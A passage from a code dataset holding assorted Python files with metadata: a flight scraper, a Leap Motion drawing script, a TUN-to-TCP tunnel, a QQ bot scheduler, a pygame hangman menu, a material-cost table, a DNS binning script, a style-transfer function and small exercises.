schedule from a schedule list')\n flightinfolist.append(flightinfo)\n return flightinfolist\n\n def start(self):\n print('start')\n flightdata = self.getchuanghanglist()\n flightlink = flightdata.flightlink\n flightstr = flightdata.flight\n listLink = self.getListData(flightlink, flightstr)\n for flight in listLink:\n flightdic = {}\n info = {}\n flightinfo = self.getaflightinfo(flight)\n if len(flightinfo) == 1:\n init = 0\n info['from'] = flightinfo[init]['qf']\n info['to'] = flightinfo[init]['dd']\n info['from_simple'] = flightinfo[init]['qf_simple']\n info['to_simple'] = flightinfo[init]['dd_simple']\n info['FromTerminal'] = flightinfo[init]['qfTerminal']\n info['ToTerminal'] = flightinfo[init]['ddTerminal']\n info['from_city'] = flightinfo[init]['qf_city']\n info['to_city'] = flightinfo[init]['dd_city']\n info['from_code'] = flightinfo[init]['qf_citycode']\n info['to_code'] = flightinfo[init]['dd_citycode']\n info['fno'] = flightinfo[init]['fno']\n info['Company'] = '3U'\n info['Date'] = flightinfo[init]['date']+\"T00:00:00\"\n info['zql'] = \"\"\n else:\n init = 1\n info['from'] = flightinfo[init]['qf']\n info['to'] = flightinfo[init]['dd']\n info['from_simple'] = flightinfo[init]['qf_simple']\n info['to_simple'] = flightinfo[init]['dd_simple']\n info['FromTerminal'] = flightinfo[init]['qfTerminal']\n info['ToTerminal'] = flightinfo[init]['ddTerminal']\n info['from_city'] = flightinfo[init]['qf_city']\n info['to_city'] = flightinfo[init]['dd_city']\n info['from_code'] = flightinfo[init]['qf_citycode']\n info['to_code'] = flightinfo[init]['dd_citycode']\n info['fno'] = flightinfo[init]['fno']\n info['Company'] = '3U'\n info['Date'] = flightinfo[init]['date']+\"T00:00:00\"\n info['zql'] = \"\"\n flightdic['Info'] = info\n flightdic['List'] = flightinfo\n self.insertintomongo(flightdic)\n\nif __name__ == '__main__':\n fp = FCZPAC()\n print(datetime.datetime.now(), \"The program has started\")\n fp.start()\n scheduler = BlockingScheduler()\n # scheduler.add_job(some_job, 'interval', hours=1)\n scheduler.add_job(fp.start, 'interval', hours=12)\n scheduler.start()\n","sub_path":"feichangzun/weihzuangIP.py","file_name":"weihzuangIP.py","file_ext":"py","file_size_in_byte":10630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"555572445","text":"\n\"\"\"\n\nCS228: Human Computer Interaction\n\nDeliverable 2: Drawing skeletons of hands with pyGame and LeapMotion\n\n\"\"\"\n\nimport sys\nsys.path.insert(0, '..')\nimport Leap\nimport pygame\nimport constants\n\ncontroller = Leap.Controller()\n\nfrom pygameWindow import PYGAME_WINDOW\n\nglobal xMin, xMax, yMin, yMax\nxMin = 10000.0\nxMax = -10000.0\nyMin = 10000.0\nyMax = -10000.0\n\ndef Scale(var_to_scale, r1, r2, r3, r4):\n \n print(r1, r2)\n if r1 == r2:\n scaled_value = int((r1+r2)/2)\n else:\n old_range = r2-r1\n new_range = r4-r3\n \n scaled_value = (((var_to_scale - r1)*new_range)/old_range)+r3\n \n return(int(scaled_value))\n \ndef Handle_Frame(frame):\n \n global xMin, xMax, yMin, yMax\n\n hand = frame.hands[0]\n fingers = hand.fingers\n for finger in fingers:\n Handle_Finger(finger)\n\ndef Handle_Finger(finger):\n\n for bone_type in range(4):\n bone = Handle_Bone(finger, bone_type)\n\ndef Handle_Bone(finger, bone_type):\n\n bone = finger.bone(bone_type)\n \n base = bone.prev_joint\n base_x, base_y = Handle_Vector_From_Leap(base)\n \n tip = bone.next_joint\n tip_x, tip_y = Handle_Vector_From_Leap(tip)\n \n pyWindow.Draw_Black_Line(base_x, base_y, tip_x, tip_y, bone_type)\n 
return(bone)\n\ndef Handle_Vector_From_Leap(vector):\n global xMin, xMax, yMin, yMax\n\n x = int(vector[0]*-1.0)\n y = int(vector[2])\n \n if x < xMin:\n xMin = x\n if x > xMax:\n xMax = x\n if y < yMin:\n yMin = y\n if y > yMax:\n yMax = y\n\n x = Scale(x, xMax, xMin, 0, constants.windowWidth)\n y = Scale(y, yMax, yMin, constants.windowWidth, 0) \n \n return(x,y)\n\npyWindow = PYGAME_WINDOW()\n\nrunning = True\nwhile running:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n pygame.event.get()\n pyWindow.Prepare()\n frame = controller.frame()\n handlist = frame.hands\n if (len(handlist) > 0):\n Handle_Frame(frame)\n\n pyWindow.Reveal()\n \npygame.quit()","sub_path":"Del02.py","file_name":"Del02.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"485285992","text":"#!/usr/bin/env python3\n\nimport ipaddress\nimport json\nimport os\nimport socket\nimport struct\nimport sys\n\nimport pytun\n\nMAGIC = b'\\x16\\xd9\\x6b\\x52'\nIP_V4_PROTO = b'\\x08\\x00'\n\nclass Config:\n def __init__(self, data):\n if data['mode'] == 'server':\n self.is_server = True\n elif data['mode'] == 'client':\n self.is_server = False\n else:\n raise RuntimeError('invalid mode \"%s\"' % data['mode'])\n\n self.address = data['address']\n self.port = data['port']\n\n self.iface_name = data['iface_name']\n self.iface_netmask = data['iface_netmask']\n self.iface_mtu = data['iface_mtu']\n\n self.iface_addr = ipaddress.IPv4Address(data['iface_addr'])\n self.iface_dstaddr = ipaddress.IPv4Address(data['iface_dstaddr'])\n\nclass IpPacket:\n def __init__(self, header, body):\n self.header = header\n self.body = body\n\n def to_byte_string(self):\n return self.header.to_byte_string() + self.body\n\nclass IpHeader:\n def __init__(self, raw):\n self.ver_ihl, \\\n self.tos, \\\n self.total_length, \\\n self.ident, \\\n self.flags_fragoffset, \\\n self.ttl, \\\n self.proto, \\\n self.chksum, \\\n src, \\\n dst, \\\n self.opt1, \\\n self.opt2, \\\n self.pad = struct.unpack('>BBHHHBBHIIHBB', raw)\n\n self.src = ipaddress.IPv4Address(src)\n self.dst = ipaddress.IPv4Address(dst)\n\n def to_byte_string(self):\n return struct.pack(\n '>BBHHHBBH4s4sHBB',\n self.ver_ihl,\n self.tos,\n self.total_length,\n self.ident,\n self.flags_fragoffset,\n self.ttl,\n self.proto,\n self.chksum,\n self.src.packed,\n self.dst.packed,\n self.opt1,\n self.opt2,\n self.pad,\n )\n\ndef main():\n config_filename = sys.argv[1]\n\n with open(config_filename) as config_file:\n config = Config(json.load(config_file))\n\n print('TUN interface addr: ', config.iface_addr)\n print('TUN interface dest addr:', config.iface_dstaddr)\n print('TUN interface name: ', config.iface_name)\n\n tun_iface = pytun.TunTapDevice(name=config.iface_name)\n\n tun_iface.addr = str(config.iface_addr)\n tun_iface.dstaddr = str(config.iface_dstaddr)\n tun_iface.netmask = config.iface_netmask\n tun_iface.mtu = config.iface_mtu\n\n tun_iface.up()\n\n addr_and_port = (config.address, config.port)\n\n if config.is_server:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print('binding to %s, port %s' % addr_and_port)\n sock.bind(addr_and_port)\n sock.listen(1)\n print('waiting for incoming connection')\n conn, client_addr = sock.accept()\n print('accepted incoming connection from %s' % client_addr[0])\n\n else:\n conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print('connecting to %s, port %s' % addr_and_port)\n 
conn.connect(addr_and_port)\n        print('connected!')\n\n    conn.setblocking(0)\n    os.set_blocking(tun_iface.fileno(), False)\n\n    while True:\n        handle_iface_data(conn, tun_iface, config)\n        handle_stream_data(conn, tun_iface, config)\n\ndef handle_iface_data(conn, tun_iface, config):\n    try:\n        buf = tun_iface.read(tun_iface.mtu)\n    except:  # non-blocking read; nothing available yet\n        return\n\n    flags = buf[:2]\n    proto = buf[2:4]\n\n    if proto != IP_V4_PROTO:\n        return\n\n    ip_packet = IpPacket(IpHeader(buf[4:28]), buf[28:])\n\n    handle_ip_packet(ip_packet, conn, tun_iface, config)\n\ndef handle_stream_data(conn, tun_iface, config):\n    try:\n        data = conn.recv(10000)\n    except:  # non-blocking recv; nothing available yet\n        return\n\n    while data != b'':\n        if data[0:4] != MAGIC:\n            raise RuntimeError('invalid magic number')\n\n        ip_packet_length = struct.unpack('>I', data[4:8])[0]\n\n        if len(data) < ip_packet_length + 8:\n            raise RuntimeError('not enough data')\n\n        ip_packet_packed = data[8:8 + ip_packet_length]\n\n        data = data[8 + ip_packet_length:]\n\n        ip_packet = IpPacket(IpHeader(ip_packet_packed[:24]), ip_packet_packed[24:])\n\n        handle_ip_packet(ip_packet, conn, tun_iface, config)\n\ndef handle_ip_packet(ip_packet, conn, tun_iface, config):\n    print('-' * 100)\n    print(\n        ip_packet.header.src,\n        '→',\n        ip_packet.header.dst,\n        'len: %d' % ip_packet.header.total_length,\n    )\n\n    ip_packet_packed = ip_packet.to_byte_string()\n\n    if len(ip_packet_packed) != ip_packet.header.total_length:\n        raise RuntimeError('invalid \"total length\" header value')\n\n    if ip_packet.header.dst == config.iface_addr:\n        print('sending to tun iface')\n        buf = b'\\x00\\x00' + IP_V4_PROTO + ip_packet_packed\n        while len(buf):\n            nbytes = tun_iface.write(buf)\n            buf = buf[nbytes:]\n    elif ip_packet.header.dst == config.iface_dstaddr:\n        print('sending to remote peer')\n        ip_packet_length = struct.pack('>I', len(ip_packet_packed))\n        buf = MAGIC + ip_packet_length + ip_packet_packed\n        conn.sendall(buf)\n    else:\n        print('unknown destination, doing nothing')\n\nif __name__ == '__main__':\n    main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"579480722","text":"import nonebot as nb\nfrom nullbot.config import AUTO_UPDATES, AUTO_DAILY_REPORT, AUTO_UPDATE_MAX_RETRIES\nfrom spideroj.mongo import DataManager\nfrom datetime import datetime\nfrom nonebot.command import call_command\nimport pytz\n\n\nasync def debug(msg):\n    bot = nb.get_bot()\n\n    await bot.send_private_msg(user_id=724463877, message=msg)\n\n\n@nb.scheduler.scheduled_job('cron', hour='18')\nasync def daily_update():\n    bot = nb.get_bot()\n\n    for group_id in AUTO_UPDATES:\n        await debug(f\"Updating for group: {group_id}\")\n        dm = DataManager(group_id)\n\n        members = await bot.get_group_member_list(group_id=group_id)\n        dm.init(members)\n\n        fails = await dm.get_and_save_all_user_summary()\n\n        await debug(f\"Group [{group_id}] update failures: {fails}\")\n\n        retry = 0\n        while fails:\n            # retry only the entries that failed in the previous round\n            to_retry = fails\n            fails = []\n            for qq_id, user_id, platform in to_retry:\n                ok, snapshot = await dm.get_and_save_user_summary(qq_id, user_id, platform)\n\n                if not ok:\n                    fails.append((qq_id, user_id, platform))\n            \n            retry += 1\n            if retry >= AUTO_UPDATE_MAX_RETRIES:\n                await debug(f\"Failures after {AUTO_UPDATE_MAX_RETRIES} retries: {fails}\")\n                break\n    \n    for group_id, mode in AUTO_DAILY_REPORT.items():\n        ctx = {'anonymous': None, 'font': 1623440, 'group_id': group_id, 'message': [{'type': 'text', 'data': {'text': 'report'}}], 'message_id': 20804, 'message_type': 'group', 'post_type': 
'message', 'raw_message': 'report', 'self_id': 2210705648, 'sender': {'age': 24, 'area': '北京', 'card': '', 'level': '冒泡', 'nickname': 'Nuullll', 'role': 'owner', 'sex': 'unknown', 'title': '', 'user_id': 724463877}, 'sub_type': 'normal', 'time': 1584248424, 'user_id': 724463877, 'to_me': True}\n if mode == 'week_delta':\n await call_command(bot, ctx, 'report')\n else:\n await call_command(bot, ctx, 'report_total')\n\n# @nb.scheduler.scheduled_job('cron', hour='12')\n# async def report_hns():\n \n# print(\"Waiting for coingecko...\")\n# ok, html = await Spider.render_html_with_splash('https://www.coingecko.com/en/coins/handshake')\n\n# if not ok:\n# return\n \n# def get_content(xpath):\n# try:\n# return html.xpath(xpath + \"/text()\")[0]\n# except:\n# return \"\"\n# usd = get_content(\"/html/body/div[2]/div[3]/div[4]/div[1]/div[2]/div[1]/span[1]\")\n# usd_d = get_content(\"/html/body/div[2]/div[3]/div[4]/div[1]/div[2]/div[1]/span[2]/span\")\n# btc = get_content(\"/html/body/div[2]/div[3]/div[4]/div[1]/div[2]/div[3]\")\n# btc_d = get_content(\"/html/body/div[2]/div[3]/div[4]/div[1]/div[2]/div[3]/span/span\")\n# l_24h = get_content(\"/html/body/div[2]/div[3]/div[6]/div/div/div[2]/div/div[1]/div/div[1]/div[1]/div[2]/div[1]/table/tbody/tr[6]/td/span[1]\")\n# h_24h = get_content(\"/html/body/div[2]/div[3]/div[6]/div/div/div[2]/div/div[1]/div/div[1]/div[1]/div[2]/div[1]/table/tbody/tr[6]/td/span[2]\")\n# l_7d = get_content(\"/html/body/div[2]/div[3]/div[6]/div/div/div[2]/div/div[1]/div/div[1]/div[1]/div[2]/div[1]/table/tbody/tr[7]/td/span[1]\")\n# h_7d = get_content(\"/html/body/div[2]/div[3]/div[6]/div/div/div[2]/div/div[1]/div/div[1]/div[1]/div[2]/div[1]/table/tbody/tr[7]/td/span[2]\")\n\n# message = f\"\"\"{datetime.now(pytz.timezone('Asia/Shanghai'))}\n# HNS Hourly Report\n# USD: {usd} {usd_d}\n# BTC: {btc} {btc_d}\n# 24h Low/High: {l_24h}/{h_24h}\n# 7d Low/High: {l_7d}/{h_7d}\n# \"\"\"\n\n# bot = nb.get_bot()\n# await bot.send_msg(user_id=724463877, message=message)","sub_path":"nullbot/manager/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18087108","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\n\nAUTHOR = 'Chris Tyson'\nSITENAME = 'Chris Tyson'\nDESCRIPTION = \"Blog description.\"\nSITEURL = ''\nPATH = 'content'\n\nTIMEZONE = 'Europe/London'\n\nDEFAULT_LANG = 'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nDEFAULT_PAGINATION = True\n\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = True\n\nTHEME = \"monospace\"\n\nDIRECT_TEMPLATES = ['blog']\nPAGINATED_DIRECT_TEMPLATES = ['blog']\n\nSTATIC_PATHS = ['documents']\n#MD_EXTENSIONS = ['codehilite(noclasses=True, pygments_style=native)', 'extra']\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"432503183","text":"import pygame\nfrom pygame.locals import *\nfrom sys import exit\nimport hangman_game\n\npygame.init()\n\ndef credits():\n pygame.init()\n\n transparent_bg = pygame.image.load('images/Backgrounds/imageedit_8_6964826368.png')\n menu_bg = pygame.image.load('images/Backgrounds/WallpaperDog-20392214(1).jpg')\n credits_text = 
pygame.image.load('images/Backgrounds/credits(fixed)(1).png')\n title = pygame.image.load('images/Text/text-1630917000711.png')\n return_icon = pygame.image.load('images/Icons/icons8-undo-50.png')\n\n click_sfx = pygame.mixer.Sound('SFX/WAV/salamisound-7509291-switch-turn-one-time-toggle.wav')\n soundtrack = pygame.mixer.music.load('SFX/WAV/salamisound-2382220-church-bell-bells-ringing-at.wav')\n pygame.mixer.music.play(-1)\n\n root = pygame.display.set_mode((730, 730))\n pygame.display.set_caption('Credits')\n\n run = True\n click = False\n\n while run:\n root.blit(menu_bg, (0, 0))\n root.blit(transparent_bg, (0, 0))\n root.blit(credits_text, (90, 90))\n root.blit(return_icon, (10, 10))\n root.blit(title, (251.5, 20))\n\n return_button_collide = pygame.Rect(10, 10, 50, 50)\n\n mx , my = pygame.mouse.get_pos()\n\n if return_button_collide.collidepoint((mx, my)):\n if click:\n click_sfx.play()\n main_menu()\n\n click = False\n \n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n exit()\n\n if event.type == MOUSEBUTTONDOWN:\n click = True\n\n pygame.display.update()\n\n pygame.quit()\n\n\ndef main_menu():\n \n bg = pygame.image.load('images/Backgrounds/WallpaperDog-20392214(1).jpg')\n grey_button = pygame.image.load('images/Buttons/CGB02-grey_M_btn.png')\n blue_button = pygame.image.load('images/Buttons/CGB02-blue_M_btn.png')\n play_text = pygame.image.load('images/Text/text-1630916444275.png')\n credits_text = pygame.image.load('images/Text/text-1630917000711.png')\n quit_text = pygame.image.load('images/Text/text-1630916779674.png')\n\n github_icon = pygame.image.load('images/Icons/icons8-github-40.png')\n gmail_icon = pygame.image.load('images/Icons/icons8-gmail-35.png')\n github_text = pygame.image.load('images/Text/text-1631459237095.png')\n gmail_text = pygame.image.load('images/Text/text-1631459278554.png')\n\n click_sfx = pygame.mixer.Sound('SFX/WAV/salamisound-7509291-switch-turn-one-time-toggle.wav')\n soundtrack = pygame.mixer.music.load('SFX/WAV/game-over-danijel-zambo-main-version-02-03-1394(1).wav')\n pygame.mixer.music.play(-1)\n\n root = pygame.display.set_mode((730, 730))\n pygame.display.set_caption('Menu')\n\n run = True\n click = False\n\n while run:\n root.blit(bg, (0, 0))\n\n root.blit(grey_button, (237, 100)) #PLAY\n root.blit(grey_button, (237, 250)) #CREDITS\n root.blit(grey_button, (237, 400)) #QUIT\n\n root.blit(github_icon, (10, 620))\n root.blit(github_text, (52, 631))\n\n root.blit(gmail_icon, (12, 670))\n root.blit(gmail_text, (51, 678))\n\n play_collide = pygame.Rect(237, 100, 256, 140)\n credits_collide = pygame.Rect(237, 250, 256, 140)\n quit_collide = pygame.Rect(237, 400, 256, 140)\n\n mx, my = pygame.mouse.get_pos()\n\n if quit_collide.collidepoint((mx, my)):\n root.blit(blue_button, (237, 400))\n if click:\n pygame.quit()\n exit()\n\n elif play_collide.collidepoint((mx, my)):\n root.blit(blue_button, (237, 100))\n if click:\n click_sfx.play()\n pygame.mixer.quit()\n hangman_game.game_loop()\n\n elif credits_collide.collidepoint((mx, my)):\n root.blit(blue_button, (237, 250))\n if click:\n click_sfx.play()\n credits()\n\n \n click = False\n\n root.blit(play_text, (301, 145.5))\n root.blit(credits_text, (251.5, 295.5))\n root.blit(quit_text, (294, 445.5))\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n exit()\n\n if event.type == MOUSEBUTTONDOWN:\n click = True\n\n pygame.display.update()\n\n 
pygame.quit()\n\nmain_menu()","sub_path":"Linux/hangman_menu.py","file_name":"hangman_menu.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"606684073","text":"# coding=utf-8\n# import AnalysisRates as ar\n# import Estimate_1 as es1\nimport numpy as np\n# import LeadStatement as ls\nimport math as mt\nimport pandas as pd\nroyalty_sand=38.4\nroyalty_stone=138.3\n\npd.set_option('max_colwidth', 0)\npd.set_option('display.expand_frame_repr', False)\npd.set_option('display.precision', 2)\n\n\ndef conveyance(x):\n    'For conveyance of Rough stone, xetal, khoa, chips, moorum, earth and sand etc.(per 1cum.)'\n    if x <= 5:\n        return 156.4\n    elif 5 < x <= 50:\n        return 156.4 + (x - 5) * 9.2\n    else:\n        return 156.4 + 45 * 9.2 + 6.5 * (x - 50)\n\n\ndef conveyance_wood(x):\n    'For conveyance of wood of 1cum volume'\n    if x <= 5:\n        return 169.0 / 1.25\n    elif 5 < x <= 50:\n        return (169 + (x - 5) * 8.6) / 1.25\n    else:\n        return (169 + 45 * 8.6 + (x - 50) * 7.3) / 1.25\n\n\ndef conveyance_cement(x):\n    'For conveyance of cement of 1qtl weight'\n    if x <= 5:\n        return 16.9\n    elif 5 < x <= 50:\n        return (16.9 + (x - 5) * 0.86)\n    else:\n        return (16.9 + 45 * 0.86 + (x - 50) * 0.73)\n\n\ndef conveyance_brick(x):\n    'Bricks of 25cm size for 1 no. '\n    if x <= 5:\n        return 1010.8 / 2000\n    elif 5 < x <= 50:\n        return (1010.8 + (x - 5) * 41.4) / 2000\n    else:\n        return (1010.8 + 45 * 41.4 + (x - 50) * 33.3) / 2000\n\n\nm = [['bricks', 1, 'local', 15, 3.38, 0], ['sand', 1, 'Mahanadi', 10, 55.0,royalty_sand],\n     ['coarse sand', 1, 'Mahanadi', 10, 48.0,royalty_sand],\n     ['cement', 1, 'Binka', 15, 622.00, 0], ['HYSD bar', 1, 'Binka', 15, 3800, 0], ['wood', 1, 'local', 5, 0, 0],\n     ['stone', 1, 'Singijuba', 20, 254.0,royalty_stone], ['10mm c.b.g. chips', 1, 'Singijuba', 30, 1150, royalty_stone],\n     ['12mm c.b.g. chips', 1, 'Singijuba', 30, 1150,royalty_stone],\n     ['20mm c.b.g. chips', 1, 'Singijuba', 30, 1130,royalty_stone], ['40mm h.g. metal', 1, 'Singijuba',30, 780,royalty_stone],\n     ['63mm h.g. 
metal', 1, 'Singijuba',20, 543, royalty_stone],['moorum',1,'Local',5,50,royalty_sand],['fly ash bricks',1,'local',15,4.2,0]]\n\n\ndef cost_of_material(mm, i, c=['Description', 'qty', 'quarry', 'lead', 'basic cost', 'Royalty']):\n table = pd.DataFrame(mm, index=i, columns=c)\n return table\na = cost_of_material([m[0]], [1])\na.insert(4,'conveyance',conveyance_brick(m[0][3]))\na['qty']=a['qty'].map('{:.0f}no'.format)\n\nb=cost_of_material([m[1]],[2])\nb.insert(4,'conveyance',conveyance(m[1][3]))\nb['qty']=b['qty'].map('{:.0f}cum'.format)\n\nc=cost_of_material([m[2]],[3])\nc.insert(4,'conveyance',conveyance(m[2][3]))\nc['qty']=c['qty'].map('{:.0f}cum'.format)\n\nd=cost_of_material([m[3]],[4])\nd.insert(4,'conveyance',conveyance_cement(m[3][3]))\nd['qty']=d['qty'].map('{:.0f}qtl'.format)\n\ne=cost_of_material([m[4]],[5])\ne.insert(4,'conveyance',conveyance_cement(m[4][3]))\ne['qty']=e['qty'].map('{:.0f}qtl'.format)\n\nf=cost_of_material([m[5]],[6])\nf.insert(4,'conveyance',conveyance_wood(m[5][3]))\nf['qty']=f['qty'].map('{:.0f}cum'.format)\n\ng=cost_of_material([m[6]],[7])\ng.insert(4,'conveyance',conveyance(m[6][3]))\ng['qty']=g['qty'].map('{:.0f}cum'.format)\n\nh=cost_of_material([m[7]],[8])\nh.insert(4,'conveyance',conveyance(m[7][3]))\nh['qty']=h['qty'].map('{:.0f}cum'.format)\n\ni=cost_of_material([m[8]],[9])\ni.insert(4,'conveyance',conveyance(m[8][3]))\ni['qty']=i['qty'].map('{:.0f}cum'.format)\n\nj=cost_of_material([m[9]],[10])\nj.insert(4,'conveyance',conveyance(m[9][3]))\nj['qty']=j['qty'].map('{:.0f}cum'.format)\n\nk=cost_of_material([m[10]],[11])\nk.insert(4,'conveyance',conveyance(m[10][3]))\nk['qty']=k['qty'].map('{:.0f}cum'.format)\n\nl=cost_of_material([m[11]],[12])\nl.insert(4,'conveyance',conveyance(m[11][3]))\nl['qty']=l['qty'].map('{:.0f}cum'.format)\n\nn=cost_of_material([m[12]],[13])\nn.insert(4,'conveyance',conveyance(m[12][3]))\nn['qty']=n['qty'].map('{:.0f}no'.format)\n\no=cost_of_material([m[13]],[14])\no.insert(4,'conveyance',conveyance_brick(m[13][3]))\no['qty']=o['qty'].map('{:.0f}no'.format)\n\n\n\n\nz = a.append(b).append(c).append(d).append(e).append(f).append(g).append(h).append(i).append(j).append(k).append(l).append(n).append(o)\nz.insert(7,'total cost',z['conveyance']+z['basic cost']+z['Royalty'])\n\n\n\nif __name__ == \"__main__\":\n z['total cost'] = z['total cost'].map('Rs.{:.2f}'.format)\n z['Royalty'] = z['Royalty'].map('Rs.{:.2f}'.format)\n z['basic cost'] = z['basic cost'].map('Rs.{:.2f}'.format)\n z['conveyance'] = z['conveyance'].map('Rs.{:.2f}'.format)\n z['lead'] = z['lead'].map('{:.0f}km'.format)\n\n print (z,'\\n\\n\\n','The lead of different materials as stated above is least and economical.')\n print ('\\n\\n\\n\\tJunior Engineer\\t\\tAssistant Engineer\\t\\tBlock Development Officer')\n print ('\\tBinka Block Office\\tBinka Block Office\\t\\t\\t\\tBinka')\n","sub_path":"LeadStatement1.py","file_name":"LeadStatement1.py","file_ext":"py","file_size_in_byte":4714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"353828516","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport argparse\nimport traceback\nfrom decimal import Decimal\nfrom collections import defaultdict\nfrom log import ExtendEntry\nsys.path.append('python-tools')\nfrom input_handling import findNumber\nfrom group import UnsortedInputGrouper,Group\n\nclass IntervalGroup(Group):\n def __init__(self, tup):\n super(IntervalGroup, self).__init__(tup)\n self.bin = {1:defaultdict(int), 2:defaultdict(int), 3:defaultdict(int)}\n 
self.begin = -1\n        self.count = 0\n\n    def finishBin(self):\n        if self.count == 0:\n            return\n\n        args.outfile.write(str(self.count) + ' ')\n        for i in sorted(self.bin):\n            if args.metric == 'max':\n                if len(self.bin[i]) == 0:\n                    m = 0\n                else:\n                    m = max(self.bin[i].items(), key = lambda n: n[1])[1]\n            elif args.metric == 'total':\n                m = len(self.bin[i])\n            args.outfile.write(str(m) + ' ')\n        args.outfile.write('\\n')\n        self.bin = {1:defaultdict(int), 2:defaultdict(int), 3:defaultdict(int)}\n        self.count = 0\n\n    def add(self, chunks):\n        e = ExtendEntry.parseChunks(chunks)\n        e.splits = list(reversed(e.query.question.rstrip('.').split('.'))) # Do not include the class or type\n\n        if e.time - self.begin > args.bin:\n            self.finishBin()\n            self.begin = e.time\n\n        self.count += 1\n        for i in range(1,len(e.splits)+1):\n            if i not in self.bin:\n                self.bin[i] = defaultdict(int)\n            self.bin[i]['.'.join(e.splits[:i])] += 1\n\n    def done(self):\n        self.finishBin()\n\nif __name__ == \"__main__\":\n    # set up command line args\n    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\\\n        description='Find similar requests in bins')\n    parser.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin)\n    parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'), default=sys.stdout)\n    parser.add_argument('-b', '--bin', type=Decimal, default=Decimal('5'))\n    parser.add_argument('-m', '--metric', choices=['max', 'total'], default='max')\n    args = parser.parse_args()\n\n    grouper = UnsortedInputGrouper(args.infile, IntervalGroup, [9], None)\n    grouper.group()\n\n","sub_path":"scripts/similar_names_bin.py","file_name":"similar_names_bin.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"177814264","text":"import os\nimport torch\nfrom torch.autograd import Variable\nimport torchvision.utils as vutils\nimport time\n\ndef whiten_and_color(cF, sF):\n    cF_size = cF.size()\n    c_mean = torch.mean(cF, 1) \n    c_mean = c_mean.unsqueeze(1).expand_as(cF)\n    cF = cF - c_mean # center by subtracting mean vector\n    # transform linearly to obtain feature maps that are uncorrelated\n    content_conv = torch.mm(cF, cF.t()).div(cF_size[1] - 1) + torch.eye(cF_size[0]).double()\n    c_u, c_s, c_v = torch.svd(content_conv,some=False)\n\n    sF_size = sF.size()\n    s_mean = torch.mean(sF, 1)\n    s_mean2 = s_mean.unsqueeze(1).expand_as(sF)\n    sF = sF - s_mean2 # center by subtracting mean vector\n    # transform linearly to obtain feature maps that are uncorrelated\n    style_conv = torch.mm(sF, sF.t()).div(sF_size[1] - 1)\n    s_u, s_s, s_v = torch.svd(style_conv,some=False)\n    \n    k_c = cF_size[0]\n    for i in range(cF_size[0]):\n        if c_s[i] < 0.00001:\n            k_c = i\n            break\n\n    k_s = sF_size[0]\n    for i in range(sF_size[0]):\n        if s_s[i] < 0.00001:\n            k_s = i\n            break\n\n    c_d = (c_s[0:k_c]).pow(-0.5)\n    step1 = torch.mm(c_v[:,0:k_c], torch.diag(c_d))\n    step2 = torch.mm(step1, (c_v[:,0:k_c].t()))\n    whiten_cF = torch.mm(step2, cF)\n\n    s_d = (s_s[0:k_s]).pow(0.5)\n    target_feature = torch.mm(torch.mm(torch.mm(s_v[:,0:k_s], torch.diag(s_d)), (s_v[:,0:k_s].t())), whiten_cF)\n    t_mean = s_mean.unsqueeze(1).expand_as(target_feature) # mean vector of style\n    target_feature = target_feature + t_mean # re-center with the mean vector of style\n    return target_feature\n\ndef transform(cF, sF, csF, alpha):\n    cF = cF.double()\n    sF = sF.double()\n\n    cF_view = cF.view(cF.size(0), -1)\n    sF_view = sF.view(cF.size(0), -1)\n\n    target_feature = 
whiten_and_color(cF_view, sF_view)\n    target_feature = target_feature.view_as(cF)\n    # after WCT, blend with the content feature before feeding it to the decoder \n    ccsF = alpha * target_feature + (1.0 - alpha) * cF # alpha serves as the style weight for users to control the transfer effect\n    ccsF = ccsF.float().unsqueeze(0)\n    with torch.no_grad():\n        csF.resize_(ccsF.size()).copy_(ccsF)\n    return csF\n\n\n","sub_path":"src/wct.py","file_name":"wct.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"312880065","text":"\"\"\"\r\n100 days of Python course\r\nDAY 3\r\n\"\"\"\r\n\r\nnumber = int(input(\"Which number do you want to check? \"))\r\n\r\n# using the modulo operator: a remainder of 0 after dividing by 2\r\n# means the number is evenly divisible\r\nif number % 2 == 0:\r\n    print(\"This is an even number.\")\r\n# Otherwise (the number cannot be divided by 2 without a remainder).\r\nelse:\r\n    print(\"This is an odd number.\")\r\n","sub_path":"odd_or_even.py","file_name":"odd_or_even.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"323295319","text":"from django.http import JsonResponse\nfrom django.utils import timezone\nfrom 